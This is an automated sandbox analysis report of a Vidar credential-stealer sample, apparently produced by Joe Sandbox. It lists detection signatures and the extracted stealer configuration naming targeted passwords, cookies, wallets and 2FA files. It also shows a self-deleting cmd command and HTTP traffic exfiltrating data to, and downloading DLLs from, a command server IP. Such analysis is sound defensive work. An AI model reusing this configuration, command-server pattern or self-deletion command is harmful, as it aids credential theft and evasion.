Play interactive tour

Edit tour

Windows Analysis Report T6zZFfRLqs.exe

Overview

General Information

Sample Name:	T6zZFfRLqs.exe
Analysis ID:	491601
MD5:	5d5e83e151a99bed97e13839e8881cb5
SHA1:	4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256:	1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
Tags:	ArkeiStealerexe
Infos:
Most interesting Screenshot:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Detected unpacking (overwrites its own PE header)

Yara detected Vidar

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Machine Learning detection for sample

Self deletion via cmd delete

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Enables debug privileges

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses taskkill to terminate processes

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

T6zZFfRLqs.exe (PID: 6576 cmdline: 'C:\Users\user\Desktop\T6zZFfRLqs.exe' MD5: 5D5E83E151A99BED97E13839E8881CB5)

cmd.exe (PID: 6820 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6860 cmdline: taskkill /im T6zZFfRLqs.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 6916 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Vidar

{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: T6zZFfRLqs.exe PID: 6576	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: T6zZFfRLqs.exe PID: 6576	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.T6zZFfRLqs.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.T6zZFfRLqs.exe.21f0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.T6zZFfRLqs.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.T6zZFfRLqs.exe.2330000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: HTTP data

Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Machine Learning detection for sample

Show sources

Source: T6zZFfRLqs.exe

Joe Sandbox ML: detected

Source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	1_2_00416200
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00416190
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	1_2_00416340

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack

Source: T6zZFfRLqs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source:	Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	1_2_0041B590
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00496670
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	1_2_0041B810
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	1_2_0040EB20
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	1_2_00405D80

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

1_2_0040F150

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 86263Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 88.99.75.82 88.99.75.82

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:09 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:09 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 